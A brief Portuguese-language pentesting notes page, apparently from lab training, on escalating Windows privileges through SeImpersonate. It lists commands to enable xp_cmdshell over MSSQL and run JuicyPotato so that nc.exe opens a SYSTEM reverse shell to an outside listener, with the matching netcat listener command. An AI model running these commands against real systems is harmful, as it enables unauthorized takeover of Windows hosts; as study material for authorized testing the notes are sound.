SeImpersonate and SeAssignPrimaryToken

Exemplo de SeImpersonate - JuicyPotato

  • Conectando com MSSQLClient.py

mssqlclient.py sql_dev@10.129.43.30 -windows-auth
  • Habilitando o xp_cmdshell

enable_xp_cmdshell
  • Confirmação de acesso

xp_cmdshell whoami
  • Privilégios da conta corrente

xp_cmdshell whoami /priv
  • Confirmar se o privilégio SeImpersonatePrivilegearrow-up-right está listado. Esse privilégio pode ser usado para se passar por uma conta privilegiada, como a do usuário NT AUTHORITY\SYSTEM

  • Aumento de privilégios usando JuicyPotato

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

Sistema de captura Shell

  • Esta operação é concluída com sucesso e um shell NT AUTHORITY\SYSTEMé recebido.

sudo nc -lnvp 8443

PrintSpoofer e RoguePotato

  • O JuicyPotato não funciona no Windows Server 2019 e no Windows 10 versão 1809 ou posterior. No entanto, o PrintSpooferarrow-up-right e o RoguePotatoarrow-up-right podem ser usados ​​para explorar os mesmos privilégios e obter NT AUTHORITY\SYSTEMacesso privilegiado.

  • Aumentando os privilégios usando o PrintSpoofer

  • Catching Reverse Shell as SYSTEM

Last updated